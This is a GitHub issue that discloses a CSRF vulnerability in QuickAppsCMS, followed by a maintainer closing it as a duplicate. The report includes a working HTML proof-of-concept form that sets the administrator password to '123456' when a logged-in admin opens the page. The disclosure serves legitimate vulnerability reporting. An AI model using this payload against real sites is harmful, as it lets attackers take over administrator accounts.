CSRF issue that allows attacker to change the administrator password #199

AutismJH · 2018-08-10T11:57:05Z

There is a CSRF vulnerability has been found in the quickappscms,which can change administrator's password.
After the administrator login in ,open this html page:
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.quickappscms.org/en_US/user/me" method="POST">
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="name" value="demo" />
      <input type="hidden" name="email" value="info&#64;quickappscms&#46;org" />
      <input type="hidden" name="public&#95;email" value="0" />
      <input type="hidden" name="public&#95;profile" value="0" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The text was updated successfully, but these errors were encountered:

botchris · 2018-08-10T12:19:53Z

Duplicate of #187

botchris added the Duplicated label Aug 10, 2018

botchris marked this as a duplicate of #187 Aug 10, 2018

botchris closed this as completed Aug 10, 2018

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CSRF issue that allows attacker to change the administrator password #199

CSRF issue that allows attacker to change the administrator password #199

AutismJH commented Aug 10, 2018 •

edited

Loading

botchris commented Aug 10, 2018

CSRF issue that allows attacker to change the administrator password #199

CSRF issue that allows attacker to change the administrator password #199

Comments

AutismJH commented Aug 10, 2018 • edited Loading

botchris commented Aug 10, 2018

AutismJH commented Aug 10, 2018 •

edited

Loading